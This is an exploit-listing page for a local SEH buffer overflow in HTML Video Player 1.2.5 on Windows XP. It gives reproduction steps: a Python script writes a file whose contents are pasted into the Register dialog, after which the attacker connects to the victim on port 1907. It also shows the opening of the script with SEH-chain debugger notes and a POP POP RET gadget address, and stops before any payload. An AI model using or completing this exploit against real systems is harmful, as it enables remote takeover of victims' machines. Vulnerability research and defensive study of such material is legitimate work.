Html video player 1.2.5 bufferoverflow (seh) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2018-11-19 |
Type : local |
Platform : windows_x86
This exploit / vulnerability Html video player 1.2.5 bufferoverflow (seh) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: HTML Video Player 1.2.5 - Buffer-Overflow (SEH)
# Author: Kağan Çapar
# Discovery Date: 2018-11-16
# Software Link: http://www.html5videoplayer.net/html5videoplayer-setup.exe
# Vendor Homepage : http://www.html5videoplayer.net
# Tested Version: 1.2.5
# Tested on OS: Windows XP SP3 *ENG
# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "exploit.txt" and copy content to clipboard
# Open software, click Help > Register and paste "Username" click "OK"
# Finally, Connect victim machine on port your localport "1907"
#!/usr/bin/python
import struct
#SEH chain of main thread, item 0
#Address=0012EAF4
#SE handler=41414141
#=> next_handler below!
#SEH chain of main thread, item 0
#Address=0012EAF4
#SE handler=336F4332 =>
#7C901931 5E POP ESI
#7C901932 5B POP EBX
#7C901933 C3 RETN